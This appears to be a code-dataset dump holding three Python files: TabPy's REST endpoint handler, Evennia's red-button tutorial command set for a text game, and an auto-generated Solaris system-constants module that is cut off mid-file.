text | repo_name | path | language | license | size | score
---|---|---|---|---|---|---
stringlengths 6–947k | stringlengths 5–100 | stringlengths 4–231 | stringclasses 1 value | stringclasses 15 values | int64 6–947k | float64 0–0.34
"""
HTTP handler to serve a specific endpoint request like
http://myserver:9004/endpoints/mymodel
For how generic endpoint requests are served, see
endpoints_handler.py
"""
import json
import logging
import shutil
from tabpy.tabpy_server.common.util import format_exception
from tabpy.tabpy_server.handlers import ManagementHandler
from tabpy.tabpy_server.handlers.base_handler import STAGING_THREAD
from tabpy.tabpy_server.management.state import get_query_object_path
from tabpy.tabpy_server.psws.callbacks import on_state_change
from tabpy.tabpy_server.handlers.util import AuthErrorStates
from tornado import gen
class EndpointHandler(ManagementHandler):
def initialize(self, app):
super(EndpointHandler, self).initialize(app)
def get(self, endpoint_name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing GET for /endpoints/{endpoint_name}")
self._add_CORS_header()
if not endpoint_name:
self.write(json.dumps(self.tabpy_state.get_endpoints()))
else:
if endpoint_name in self.tabpy_state.get_endpoints():
self.write(json.dumps(self.tabpy_state.get_endpoints()[endpoint_name]))
else:
self.error_out(
404,
"Unknown endpoint",
info=f"Endpoint {endpoint_name} is not found",
)
@gen.coroutine
def put(self, name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing PUT for /endpoints/{name}")
try:
if not self.request.body:
self.error_out(400, "Input body cannot be empty")
self.finish()
return
try:
request_data = json.loads(self.request.body.decode("utf-8"))
except BaseException as ex:
self.error_out(
400, log_message="Failed to decode input body", info=str(ex)
)
self.finish()
return
# check if endpoint exists
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
new_version = int(endpoints[name]["version"]) + 1
self.logger.log(logging.INFO, f"Endpoint info: {request_data}")
err_msg = yield self._add_or_update_endpoint(
"update", name, new_version, request_data
)
if err_msg:
self.error_out(400, err_msg)
self.finish()
else:
self.write(self.tabpy_state.get_endpoints(name))
self.finish()
except Exception as e:
err_msg = format_exception(e, "update_endpoint")
self.error_out(500, err_msg)
self.finish()
@gen.coroutine
def delete(self, name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing DELETE for /endpoints/{name}")
try:
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
# update state
try:
endpoint_info = self.tabpy_state.delete_endpoint(name)
except Exception as e:
self.error_out(400, f"Error when removing endpoint: {e.message}")
self.finish()
return
# delete files
if endpoint_info["type"] != "alias":
delete_path = get_query_object_path(
self.settings["state_file_path"], name, None
)
try:
yield self._delete_po_future(delete_path)
except Exception as e:
self.error_out(400, f"Error while deleting: {e}")
self.finish()
return
self.set_status(204)
self.finish()
except Exception as e:
err_msg = format_exception(e, "delete endpoint")
self.error_out(500, err_msg)
self.finish()
on_state_change(
self.settings, self.tabpy_state, self.python_service, self.logger
)
@gen.coroutine
def _delete_po_future(self, delete_path):
future = STAGING_THREAD.submit(shutil.rmtree, delete_path)
ret = yield future
raise gen.Return(ret)
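# --- Hypothetical usage sketch (not part of the TabPy source above) ---
# Illustrates the three requests this handler serves, assuming a TabPy server
# on http://localhost:9004 and the third-party `requests` library; "mymodel"
# is the example endpoint name from the module docstring, the PUT body fields
# are invented for illustration, and auth headers are omitted.
import requests
BASE = "http://localhost:9004/endpoints"
info = requests.get(f"{BASE}/mymodel")  # GET: endpoint info, or 404 if unknown
updated = requests.put(f"{BASE}/mymodel", json={"description": "updated"})  # PUT: bumps the version
deleted = requests.delete(f"{BASE}/mymodel")  # DELETE: 204 on success
print(info.status_code, updated.status_code, deleted.status_code)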
|
tableau/TabPy
|
tabpy/tabpy_server/handlers/endpoint_handler.py
|
Python
|
mit
| 4,926 | 0.001015 |
"""
This defines the cmdset for the red_button. Here we have defined
the commands and the cmdset in the same module, but if you
have many different commands to merge it is often better
to define the cmdset separately, picking and choosing from
among the available commands as to what should be included in the
cmdset - this way you can often re-use the commands too.
"""
import random
from evennia import Command, CmdSet
# Some simple commands for the red button
# ------------------------------------------------------------
# Commands defined on the red button
# ------------------------------------------------------------
class CmdNudge(Command):
"""
Try to nudge the button's lid
Usage:
nudge lid
This command will have you try to
push the lid of the button away.
"""
key = "nudge lid" # two-word command name!
aliases = ["nudge"]
locks = "cmd:all()"
def func(self):
"""
nudge the lid. Random chance of success to open it.
"""
rand = random.random()
if rand < 0.5:
self.caller.msg("You nudge at the lid. It seems stuck.")
elif rand < 0.7:
self.caller.msg("You move the lid back and forth. It won't budge.")
else:
self.caller.msg("You manage to get a nail under the lid.")
self.caller.execute_cmd("open lid")
class CmdPush(Command):
"""
Push the red button
Usage:
push button
"""
key = "push button"
aliases = ["push", "press button", "press"]
locks = "cmd:all()"
def func(self):
"""
Note that we choose to implement this by checking
whether the lid is open or closed. This is because this command
is likely to be tried regardless of the state of the lid.
An alternative would be to make two versions of this command
and tuck them into the cmdset linked to the Open and Closed
lid-state respectively.
"""
if self.obj.db.lid_open:
string = "You reach out to press the big red button ..."
string += "\n\nA BOOM! A bright light blinds you!"
string += "\nThe world goes dark ..."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s presses the button. BOOM! %s is blinded by a flash!"
% (self.caller.name, self.caller.name),
exclude=self.caller,
)
# the button's method will handle all setup of scripts etc.
self.obj.press_button(self.caller)
else:
string = "You cannot push the button - there is a glass lid covering it."
self.caller.msg(string)
class CmdSmashGlass(Command):
"""
smash glass
Usage:
smash glass
Try to smash the glass of the button.
"""
key = "smash glass"
aliases = ["smash lid", "break lid", "smash"]
locks = "cmd:all()"
def func(self):
"""
The lid won't open, but there is a small chance
of causing the lamp to break.
"""
rand = random.random()
if rand < 0.2:
string = "You smash your hand against the glass"
string += " with all your might. The lid won't budge"
string += " but you cause quite the tremor through the button's mount."
string += "\nIt looks like the button's lamp stopped working for the time being."
self.obj.lamp_works = False
elif rand < 0.6:
string = "You hit the lid hard. It doesn't move an inch."
else:
string = "You place a well-aimed fist against the glass of the lid."
string += " Unfortunately all you get is a pain in your hand. Maybe"
string += " you should just try to open the lid instead?"
self.caller.msg(string)
self.caller.location.msg_contents(
"%s tries to smash the glass of the button." % (self.caller.name), exclude=self.caller
)
class CmdOpenLid(Command):
"""
open lid
Usage:
open lid
"""
key = "open lid"
aliases = ["open button", "open"]
locks = "cmd:all()"
def func(self):
"simply call the right function."
if self.obj.db.lid_locked:
self.caller.msg("This lid seems locked in place for the moment.")
return
string = "\nA ticking sound is heard, like a winding mechanism. Seems "
string += "the lid will soon close again."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s opens the lid of the button." % (self.caller.name), exclude=self.caller
)
# add the relevant cmdsets to button
self.obj.cmdset.add(LidClosedCmdSet)
# call object method
self.obj.open_lid()
class CmdCloseLid(Command):
"""
close the lid
Usage:
close lid
Closes the lid of the red button.
"""
key = "close lid"
aliases = ["close"]
locks = "cmd:all()"
def func(self):
"Close the lid"
self.obj.close_lid()
# this will clean out scripts dependent on lid being open.
self.caller.msg("You close the button's lid. It clicks back into place.")
self.caller.location.msg_contents(
"%s closes the button's lid." % (self.caller.name), exclude=self.caller
)
class CmdBlindLook(Command):
"""
Looking around in darkness
Usage:
look <obj>
... not that there's much to see in the dark.
"""
key = "look"
aliases = ["l", "get", "examine", "ex", "feel", "listen"]
locks = "cmd:all()"
def func(self):
"This replaces all the senses when blinded."
# we decide what to reply based on which command was
# actually tried
if self.cmdstring == "get":
string = "You fumble around blindly without finding anything."
elif self.cmdstring == "examine":
string = "You try to examine your surroundings, but can't see a thing."
elif self.cmdstring == "listen":
string = "You are deafened by the boom."
elif self.cmdstring == "feel":
string = "You fumble around, hands outstretched. You bump your knee."
else:
# trying to look
string = "You are temporarily blinded by the flash. "
string += "Until it wears off, all you can do is feel around blindly."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s stumbles around, blinded." % (self.caller.name), exclude=self.caller
)
class CmdBlindHelp(Command):
"""
Help function while in the blinded state
Usage:
help
"""
key = "help"
aliases = "h"
locks = "cmd:all()"
def func(self):
"Give a message."
self.caller.msg("You are beyond help ... until you can see again.")
# ---------------------------------------------------------------
# Command sets for the red button
# ---------------------------------------------------------------
# We next tuck these commands into their respective command sets.
# (note that we are overdoing the cmdset separation a bit here
# to show how it works).
class DefaultCmdSet(CmdSet):
"""
The default cmdset always sits
on the button object and whereas other
command sets may be added/merge onto it
and hide it, removing them will always
bring it back. It's added to the object
using obj.cmdset.add_default().
"""
key = "RedButtonDefault"
mergetype = "Union" # this is default, we don't really need to put it here.
def at_cmdset_creation(self):
"Init the cmdset"
self.add(CmdPush())
class LidClosedCmdSet(CmdSet):
"""
A simple cmdset tied to the redbutton object.
It contains the commands that launches the other
command sets, making the red button a self-contained
item (i.e. you don't have to manually add any
scripts etc to it when creating it).
"""
key = "LidClosedCmdSet"
# default Union is used *except* if we are adding to a
# cmdset named LidOpenCmdSet - this one we replace
# completely.
key_mergetype = {"LidOpenCmdSet": "Replace"}
def at_cmdset_creation(self):
"Populates the cmdset when it is instantiated."
self.add(CmdNudge())
self.add(CmdSmashGlass())
self.add(CmdOpenLid())
class LidOpenCmdSet(CmdSet):
"""
This is the opposite of the Closed cmdset.
"""
key = "LidOpenCmdSet"
# default Union is used *except* if we are adding to a
# cmdset named LidClosedCmdSet - this one we replace
# completely.
key_mergetype = {"LidClosedCmdSet": "Replace"}
def at_cmdset_creation(self):
"setup the cmdset (just one command)"
self.add(CmdCloseLid())
class BlindCmdSet(CmdSet):
"""
This is the cmdset added to the *account* when
the button is pushed.
"""
key = "BlindCmdSet"
# we want it to completely replace all normal commands
# until the timed script removes it again.
mergetype = "Replace"
# we want to stop the account from walking around
# in this blinded state, so we hide all exits too.
# (channel commands will still work).
no_exits = True # keep account in the same room
no_objs = True # don't allow object commands
def at_cmdset_creation(self):
"Setup the blind cmdset"
from evennia.commands.default.general import CmdSay
from evennia.commands.default.general import CmdPose
self.add(CmdSay())
self.add(CmdPose())
self.add(CmdBlindLook())
self.add(CmdBlindHelp())
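# --- Hypothetical usage sketch (not part of the tutorial module above) ---
# A minimal typeclass showing how these cmdsets could be attached to a button
# object; the real tutorial object (red_button.RedButton) is more elaborate,
# and the class name and attribute defaults below are invented for illustration.
from evennia import DefaultObject
class SimpleRedButton(DefaultObject):
    def at_object_creation(self):
        # the default cmdset (CmdPush) always sits on the button ...
        self.cmdset.add_default(DefaultCmdSet)
        # ... and the button starts out with its lid closed
        self.cmdset.add(LidClosedCmdSet)
        self.db.lid_open = False
        self.db.lid_locked = False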
|
jamesbeebop/evennia
|
evennia/contrib/tutorial_examples/cmdset_red_button.py
|
Python
|
bsd-3-clause
| 9,705 | 0.001443 |
# Generated by h2py from /usr/include/netinet/in.h
# Included from sys/feature_tests.h
# Included from sys/isa_defs.h
_CHAR_ALIGNMENT = 1
_SHORT_ALIGNMENT = 2
_INT_ALIGNMENT = 4
_LONG_ALIGNMENT = 8
_LONG_LONG_ALIGNMENT = 8
_DOUBLE_ALIGNMENT = 8
_LONG_DOUBLE_ALIGNMENT = 16
_POINTER_ALIGNMENT = 8
_MAX_ALIGNMENT = 16
_ALIGNMENT_REQUIRED = 1
_CHAR_ALIGNMENT = 1
_SHORT_ALIGNMENT = 2
_INT_ALIGNMENT = 4
_LONG_ALIGNMENT = 4
_LONG_LONG_ALIGNMENT = 4
_DOUBLE_ALIGNMENT = 4
_LONG_DOUBLE_ALIGNMENT = 4
_POINTER_ALIGNMENT = 4
_MAX_ALIGNMENT = 4
_ALIGNMENT_REQUIRED = 0
_CHAR_ALIGNMENT = 1
_SHORT_ALIGNMENT = 2
_INT_ALIGNMENT = 4
_LONG_LONG_ALIGNMENT = 8
_DOUBLE_ALIGNMENT = 8
_ALIGNMENT_REQUIRED = 1
_LONG_ALIGNMENT = 4
_LONG_DOUBLE_ALIGNMENT = 8
_POINTER_ALIGNMENT = 4
_MAX_ALIGNMENT = 8
_LONG_ALIGNMENT = 8
_LONG_DOUBLE_ALIGNMENT = 16
_POINTER_ALIGNMENT = 8
_MAX_ALIGNMENT = 16
_POSIX_C_SOURCE = 1
_LARGEFILE64_SOURCE = 1
_LARGEFILE_SOURCE = 1
_FILE_OFFSET_BITS = 64
_FILE_OFFSET_BITS = 32
_POSIX_C_SOURCE = 199506L
_POSIX_PTHREAD_SEMANTICS = 1
_XOPEN_VERSION = 500
_XOPEN_VERSION = 4
_XOPEN_VERSION = 3
from TYPES import *
# Included from sys/stream.h
# Included from sys/vnode.h
from TYPES import *
# Included from sys/t_lock.h
# Included from sys/machlock.h
from TYPES import *
LOCK_HELD_VALUE = 0xff
def SPIN_LOCK(pl): return ((pl) > ipltospl(LOCK_LEVEL))
def LOCK_SAMPLE_INTERVAL(i): return (((i) & 0xff) == 0)
CLOCK_LEVEL = 10
LOCK_LEVEL = 10
DISP_LEVEL = (LOCK_LEVEL + 1)
PTR24_LSB = 5
PTR24_MSB = (PTR24_LSB + 24)
PTR24_ALIGN = 32
PTR24_BASE = 0xe0000000
# Included from sys/param.h
from TYPES import *
_POSIX_VDISABLE = 0
MAX_INPUT = 512
MAX_CANON = 256
UID_NOBODY = 60001
GID_NOBODY = UID_NOBODY
UID_NOACCESS = 60002
MAX_TASKID = 999999
MAX_MAXPID = 999999
DEFAULT_MAXPID = 999999
DEFAULT_JUMPPID = 100000
DEFAULT_MAXPID = 30000
DEFAULT_JUMPPID = 0
MAXUID = 2147483647
MAXPROJID = MAXUID
MAXLINK = 32767
NMOUNT = 40
CANBSIZ = 256
NOFILE = 20
NGROUPS_UMIN = 0
NGROUPS_UMAX = 32
NGROUPS_MAX_DEFAULT = 16
NZERO = 20
NULL = 0L
NULL = 0
CMASK = 022
CDLIMIT = (1L<<11)
NBPS = 0x20000
NBPSCTR = 512
UBSIZE = 512
SCTRSHFT = 9
SYSNAME = 9
PREMOTE = 39
MAXPATHLEN = 1024
MAXSYMLINKS = 20
MAXNAMELEN = 256
NADDR = 13
PIPE_BUF = 5120
PIPE_MAX = 5120
NBBY = 8
MAXBSIZE = 8192
DEV_BSIZE = 512
DEV_BSHIFT = 9
MAXFRAG = 8
MAXOFF32_T = 0x7fffffff
MAXOFF_T = 0x7fffffffffffffffl
MAXOFFSET_T = 0x7fffffffffffffffl
MAXOFF_T = 0x7fffffffl
MAXOFFSET_T = 0x7fffffff
def btodb(bytes): return \
def dbtob(db): return \
def lbtodb(bytes): return \
def ldbtob(db): return \
NCARGS32 = 0x100000
NCARGS64 = 0x200000
NCARGS = NCARGS64
NCARGS = NCARGS32
FSHIFT = 8
FSCALE = (1<<FSHIFT)
def DELAY(n): return drv_usecwait(n)
def mmu_ptob(x): return ((x) << MMU_PAGESHIFT)
def mmu_btop(x): return (((x)) >> MMU_PAGESHIFT)
def mmu_btopr(x): return ((((x) + MMU_PAGEOFFSET) >> MMU_PAGESHIFT))
def mmu_ptod(x): return ((x) << (MMU_PAGESHIFT - DEV_BSHIFT))
def ptod(x): return ((x) << (PAGESHIFT - DEV_BSHIFT))
def ptob(x): return ((x) << PAGESHIFT)
def btop(x): return (((x) >> PAGESHIFT))
def btopr(x): return ((((x) + PAGEOFFSET) >> PAGESHIFT))
def dtop(DD): return (((DD) + NDPP - 1) >> (PAGESHIFT - DEV_BSHIFT))
def dtopt(DD): return ((DD) >> (PAGESHIFT - DEV_BSHIFT))
_AIO_LISTIO_MAX = (4096)
_AIO_MAX = (-1)
_MQ_OPEN_MAX = (32)
_MQ_PRIO_MAX = (32)
_SEM_NSEMS_MAX = INT_MAX
_SEM_VALUE_MAX = INT_MAX
# Included from sys/unistd.h
_CS_PATH = 65
_CS_LFS_CFLAGS = 68
_CS_LFS_LDFLAGS = 69
_CS_LFS_LIBS = 70
_CS_LFS_LINTFLAGS = 71
_CS_LFS64_CFLAGS = 72
_CS_LFS64_LDFLAGS = 73
_CS_LFS64_LIBS = 74
_CS_LFS64_LINTFLAGS = 75
_CS_XBS5_ILP32_OFF32_CFLAGS = 700
_CS_XBS5_ILP32_OFF32_LDFLAGS = 701
_CS_XBS5_ILP32_OFF32_LIBS = 702
_CS_XBS5_ILP32_OFF32_LINTFLAGS = 703
_CS_XBS5_ILP32_OFFBIG_CFLAGS = 705
_CS_XBS5_ILP32_OFFBIG_LDFLAGS = 706
_CS_XBS5_ILP32_OFFBIG_LIBS = 707
_CS_XBS5_ILP32_OFFBIG_LINTFLAGS = 708
_CS_XBS5_LP64_OFF64_CFLAGS = 709
_CS_XBS5_LP64_OFF64_LDFLAGS = 710
_CS_XBS5_LP64_OFF64_LIBS = 711
_CS_XBS5_LP64_OFF64_LINTFLAGS = 712
_CS_XBS5_LPBIG_OFFBIG_CFLAGS = 713
_CS_XBS5_LPBIG_OFFBIG_LDFLAGS = 714
_CS_XBS5_LPBIG_OFFBIG_LIBS = 715
_CS_XBS5_LPBIG_OFFBIG_LINTFLAGS = 716
_SC_ARG_MAX = 1
_SC_CHILD_MAX = 2
_SC_CLK_TCK = 3
_SC_NGROUPS_MAX = 4
_SC_OPEN_MAX = 5
_SC_JOB_CONTROL = 6
_SC_SAVED_IDS = 7
_SC_VERSION = 8
_SC_PASS_MAX = 9
_SC_LOGNAME_MAX = 10
_SC_PAGESIZE = 11
_SC_XOPEN_VERSION = 12
_SC_NPROCESSORS_CONF = 14
_SC_NPROCESSORS_ONLN = 15
_SC_STREAM_MAX = 16
_SC_TZNAME_MAX = 17
_SC_AIO_LISTIO_MAX = 18
_SC_AIO_MAX = 19
_SC_AIO_PRIO_DELTA_MAX = 20
_SC_ASYNCHRONOUS_IO = 21
_SC_DELAYTIMER_MAX = 22
_SC_FSYNC = 23
_SC_MAPPED_FILES = 24
_SC_MEMLOCK = 25
_SC_MEMLOCK_RANGE = 26
_SC_MEMORY_PROTECTION = 27
_SC_MESSAGE_PASSING = 28
_SC_MQ_OPEN_MAX = 29
_SC_MQ_PRIO_MAX = 30
_SC_PRIORITIZED_IO = 31
_SC_PRIORITY_SCHEDULING = 32
_SC_REALTIME_SIGNALS = 33
_SC_RTSIG_MAX = 34
_SC_SEMAPHORES = 35
_SC_SEM_NSEMS_MAX = 36
_SC_SEM_VALUE_MAX = 37
_SC_SHARED_MEMORY_OBJECTS = 38
_SC_SIGQUEUE_MAX = 39
_SC_SIGRT_MIN = 40
_SC_SIGRT_MAX = 41
_SC_SYNCHRONIZED_IO = 42
_SC_TIMERS = 43
_SC_TIMER_MAX = 44
_SC_2_C_BIND = 45
_SC_2_C_DEV = 46
_SC_2_C_VERSION = 47
_SC_2_FORT_DEV = 48
_SC_2_FORT_RUN = 49
_SC_2_LOCALEDEF = 50
_SC_2_SW_DEV = 51
_SC_2_UPE = 52
_SC_2_VERSION = 53
_SC_BC_BASE_MAX = 54
_SC_BC_DIM_MAX = 55
_SC_BC_SCALE_MAX = 56
_SC_BC_STRING_MAX = 57
_SC_COLL_WEIGHTS_MAX = 58
_SC_EXPR_NEST_MAX = 59
_SC_LINE_MAX = 60
_SC_RE_DUP_MAX = 61
_SC_XOPEN_CRYPT = 62
_SC_XOPEN_ENH_I18N = 63
_SC_XOPEN_SHM = 64
_SC_2_CHAR_TERM = 66
_SC_XOPEN_XCU_VERSION = 67
_SC_ATEXIT_MAX = 76
_SC_IOV_MAX = 77
_SC_XOPEN_UNIX = 78
_SC_PAGE_SIZE = _SC_PAGESIZE
_SC_T_IOV_MAX = 79
_SC_PHYS_PAGES = 500
_SC_AVPHYS_PAGES = 501
_SC_COHER_BLKSZ = 503
_SC_SPLIT_CACHE = 504
_SC_ICACHE_SZ = 505
_SC_DCACHE_SZ = 506
_SC_ICACHE_LINESZ = 507
_SC_DCACHE_LINESZ = 508
_SC_ICACHE_BLKSZ = 509
_SC_DCACHE_BLKSZ = 510
_SC_DCACHE_TBLKSZ = 511
_SC_ICACHE_ASSOC = 512
_SC_DCACHE_ASSOC = 513
_SC_MAXPID = 514
_SC_STACK_PROT = 515
_SC_THREAD_DESTRUCTOR_ITERATIONS = 568
_SC_GETGR_R_SIZE_MAX = 569
_SC_GETPW_R_SIZE_MAX = 570
_SC_LOGIN_NAME_MAX = 571
_SC_THREAD_KEYS_MAX = 572
_SC_THREAD_STACK_MIN = 573
_SC_THREAD_THREADS_MAX = 574
_SC_TTY_NAME_MAX = 575
_SC_THREADS = 576
_SC_THREAD_ATTR_STACKADDR = 577
_SC_THREAD_ATTR_STACKSIZE = 578
_SC_THREAD_PRIORITY_SCHEDULING = 579
_SC_THREAD_PRIO_INHERIT = 580
_SC_THREAD_PRIO_PROTECT = 581
_SC_THREAD_PROCESS_SHARED = 582
_SC_THREAD_SAFE_FUNCTIONS = 583
_SC_XOPEN_LEGACY = 717
_SC_XOPEN_REALTIME = 718
_SC_XOPEN_REALTIME_THREADS = 719
_SC_XBS5_ILP32_OFF32 = 720
_SC_XBS5_ILP32_OFFBIG = 721
_SC_XBS5_LP64_OFF64 = 722
_SC_XBS5_LPBIG_OFFBIG = 723
_PC_LINK_MAX = 1
_PC_MAX_CANON = 2
_PC_MAX_INPUT = 3
_PC_NAME_MAX = 4
_PC_PATH_MAX = 5
_PC_PIPE_BUF = 6
_PC_NO_TRUNC = 7
_PC_VDISABLE = 8
_PC_CHOWN_RESTRICTED = 9
_PC_ASYNC_IO = 10
_PC_PRIO_IO = 11
_PC_SYNC_IO = 12
_PC_FILESIZEBITS = 67
_PC_LAST = 67
_POSIX_VERSION = 199506L
_POSIX2_VERSION = 199209L
_POSIX2_C_VERSION = 199209L
_XOPEN_XCU_VERSION = 4
_XOPEN_REALTIME = 1
_XOPEN_ENH_I18N = 1
_XOPEN_SHM = 1
_POSIX2_C_BIND = 1
_POSIX2_CHAR_TERM = 1
_POSIX2_LOCALEDEF = 1
_POSIX2_C_DEV = 1
_POSIX2_SW_DEV = 1
_POSIX2_UPE = 1
# Included from sys/mutex.h
from TYPES import *
def MUTEX_HELD(x): return (mutex_owned(x))
# Included from sys/rwlock.h
from TYPES import *
def RW_READ_HELD(x): return (rw_read_held((x)))
def RW_WRITE_HELD(x): return (rw_write_held((x)))
def RW_LOCK_HELD(x): return (rw_lock_held((x)))
def RW_ISWRITER(x): return (rw_iswriter(x))
# Included from sys/semaphore.h
# Included from sys/thread.h
from TYPES import *
# Included from sys/klwp.h
from TYPES import *
# Included from sys/condvar.h
from TYPES import *
# Included from sys/time.h
# Included from sys/types32.h
# Included from sys/int_types.h
TIME32_MAX = INT32_MAX
TIME32_MIN = INT32_MIN
def TIMEVAL_OVERFLOW(tv): return \
from TYPES import *
DST_NONE = 0
DST_USA = 1
DST_AUST = 2
DST_WET = 3
DST_MET = 4
DST_EET = 5
DST_CAN = 6
DST_GB = 7
DST_RUM = 8
DST_TUR = 9
DST_AUSTALT = 10
ITIMER_REAL = 0
ITIMER_VIRTUAL = 1
ITIMER_PROF = 2
ITIMER_REALPROF = 3
def ITIMERVAL_OVERFLOW(itv): return \
SEC = 1
MILLISEC = 1000
MICROSEC = 1000000
NANOSEC = 1000000000
# Included from sys/time_impl.h
def TIMESPEC_OVERFLOW(ts): return \
def ITIMERSPEC_OVERFLOW(it): return \
__CLOCK_REALTIME0 = 0
CLOCK_VIRTUAL = 1
CLOCK_PROF = 2
__CLOCK_REALTIME3 = 3
CLOCK_HIGHRES = 4
CLOCK_MAX = 5
CLOCK_REALTIME = __CLOCK_REALTIME3
CLOCK_REALTIME = __CLOCK_REALTIME0
TIMER_RELTIME = 0x0
TIMER_ABSTIME = 0x1
def TICK_TO_SEC(tick): return ((tick) / hz)
def SEC_TO_TICK(sec): return ((sec) * hz)
def TICK_TO_MSEC(tick): return \
def MSEC_TO_TICK(msec): return \
def MSEC_TO_TICK_ROUNDUP(msec): return \
def TICK_TO_USEC(tick): return ((tick) * usec_per_tick)
def USEC_TO_TICK(usec): return ((usec) / usec_per_tick)
def USEC_TO_TICK_ROUNDUP(usec): return \
def TICK_TO_NSEC(tick): return ((tick) * nsec_per_tick)
def NSEC_TO_TICK(nsec): return ((nsec) / nsec_per_tick)
def NSEC_TO_TICK_ROUNDUP(nsec): return \
def TIMEVAL_TO_TICK(tvp): return \
def TIMESTRUC_TO_TICK(tsp): return \
# Included from time.h
from TYPES import *
# Included from iso/time_iso.h
NULL = 0L
NULL = 0
CLOCKS_PER_SEC = 1000000
# Included from sys/select.h
FD_SETSIZE = 65536
FD_SETSIZE = 1024
_NBBY = 8
NBBY = _NBBY
def FD_ZERO(p): return bzero((p), sizeof (*(p)))
# Included from sys/signal.h
# Included from sys/iso/signal_iso.h
SIGHUP = 1
SIGINT = 2
SIGQUIT = 3
SIGILL = 4
SIGTRAP = 5
SIGIOT = 6
SIGABRT = 6
SIGEMT = 7
SIGFPE = 8
SIGKILL = 9
SIGBUS = 10
SIGSEGV = 11
SIGSYS = 12
SIGPIPE = 13
SIGALRM = 14
SIGTERM = 15
SIGUSR1 = 16
SIGUSR2 = 17
SIGCLD = 18
SIGCHLD = 18
SIGPWR = 19
SIGWINCH = 20
SIGURG = 21
SIGPOLL = 22
SIGIO = SIGPOLL
SIGSTOP = 23
SIGTSTP = 24
SIGCONT = 25
SIGTTIN = 26
SIGTTOU = 27
SIGVTALRM = 28
SIGPROF = 29
SIGXCPU = 30
SIGXFSZ = 31
SIGWAITING = 32
SIGLWP = 33
SIGFREEZE = 34
SIGTHAW = 35
SIGCANCEL = 36
SIGLOST = 37
_SIGRTMIN = 38
_SIGRTMAX = 45
SIG_BLOCK = 1
SIG_UNBLOCK = 2
SIG_SETMASK = 3
SIGNO_MASK = 0xFF
SIGDEFER = 0x100
SIGHOLD = 0x200
SIGRELSE = 0x400
SIGIGNORE = 0x800
SIGPAUSE = 0x1000
# Included from sys/siginfo.h
from TYPES import *
SIGEV_NONE = 1
SIGEV_SIGNAL = 2
SIGEV_THREAD = 3
SI_NOINFO = 32767
SI_USER = 0
SI_LWP = (-1)
SI_QUEUE = (-2)
SI_TIMER = (-3)
SI_ASYNCIO = (-4)
SI_MESGQ = (-5)
# Included from sys/machsig.h
ILL_ILLOPC = 1
ILL_ILLOPN = 2
ILL_ILLADR = 3
ILL_ILLTRP = 4
ILL_PRVOPC = 5
ILL_PRVREG = 6
ILL_COPROC = 7
ILL_BADSTK = 8
NSIGILL = 8
EMT_TAGOVF = 1
EMT_CPCOVF = 2
NSIGEMT = 2
FPE_INTDIV = 1
FPE_INTOVF = 2
FPE_FLTDIV = 3
FPE_FLTOVF = 4
FPE_FLTUND = 5
FPE_FLTRES = 6
FPE_FLTINV = 7
FPE_FLTSUB = 8
NSIGFPE = 8
SEGV_MAPERR = 1
SEGV_ACCERR = 2
NSIGSEGV = 2
BUS_ADRALN = 1
BUS_ADRERR = 2
BUS_OBJERR = 3
NSIGBUS = 3
TRAP_BRKPT = 1
TRAP_TRACE = 2
TRAP_RWATCH = 3
TRAP_WWATCH = 4
TRAP_XWATCH = 5
NSIGTRAP = 5
CLD_EXITED = 1
CLD_KILLED = 2
CLD_DUMPED = 3
CLD_TRAPPED = 4
CLD_STOPPED = 5
CLD_CONTINUED = 6
NSIGCLD = 6
POLL_IN = 1
POLL_OUT = 2
POLL_MSG = 3
POLL_ERR = 4
POLL_PRI = 5
POLL_HUP = 6
NSIGPOLL = 6
PROF_SIG = 1
NSIGPROF = 1
SI_MAXSZ = 256
SI_MAXSZ = 128
# Included from sys/time_std_impl.h
from TYPES import *
SI32_MAXSZ = 128
def SI_CANQUEUE(c): return ((c) <= SI_QUEUE)
SA_NOCLDSTOP = 0x00020000
SA_ONSTACK = 0x00000001
SA_RESETHAND = 0x00000002
SA_RESTART = 0x00000004
SA_SIGINFO = 0x00000008
SA_NODEFER = 0x00000010
SA_NOCLDWAIT = 0x00010000
SA_WAITSIG = 0x00010000
NSIG = 46
MAXSIG = 45
S_SIGNAL = 1
S_SIGSET = 2
S_SIGACTION = 3
S_NONE = 4
MINSIGSTKSZ = 2048
SIGSTKSZ = 8192
SS_ONSTACK = 0x00000001
SS_DISABLE = 0x00000002
SN_PROC = 1
SN_CANCEL = 2
SN_SEND = 3
# Included from sys/ucontext.h
from TYPES import *
# Included from sys/regset.h
REG_CCR = (0)
REG_PSR = (0)
REG_PSR = (0)
REG_PC = (1)
REG_nPC = (2)
REG_Y = (3)
REG_G1 = (4)
REG_G2 = (5)
REG_G3 = (6)
REG_G4 = (7)
REG_G5 = (8)
REG_G6 = (9)
REG_G7 = (10)
REG_O0 = (11)
REG_O1 = (12)
REG_O2 = (13)
REG_O3 = (14)
REG_O4 = (15)
REG_O5 = (16)
REG_O6 = (17)
REG_O7 = (18)
REG_ASI = (19)
REG_FPRS = (20)
REG_PS = REG_PSR
REG_SP = REG_O6
REG_R0 = REG_O0
REG_R1 = REG_O1
_NGREG = 21
_NGREG = 19
NGREG = _NGREG
_NGREG32 = 19
_NGREG64 = 21
SPARC_MAXREGWINDOW = 31
MAXFPQ = 16
XRS_ID = 0x78727300
# Included from v7/sys/privregs.h
# Included from v7/sys/psr.h
PSR_CWP = 0x0000001F
PSR_ET = 0x00000020
PSR_PS = 0x00000040
PSR_S = 0x00000080
PSR_PIL = 0x00000F00
PSR_EF = 0x00001000
PSR_EC = 0x00002000
PSR_RSV = 0x000FC000
PSR_ICC = 0x00F00000
PSR_C = 0x00100000
PSR_V = 0x00200000
PSR_Z = 0x00400000
PSR_N = 0x00800000
PSR_VER = 0x0F000000
PSR_IMPL = 0xF0000000
PSL_ALLCC = PSR_ICC
PSL_USER = (PSR_S)
PSL_USERMASK = (PSR_ICC)
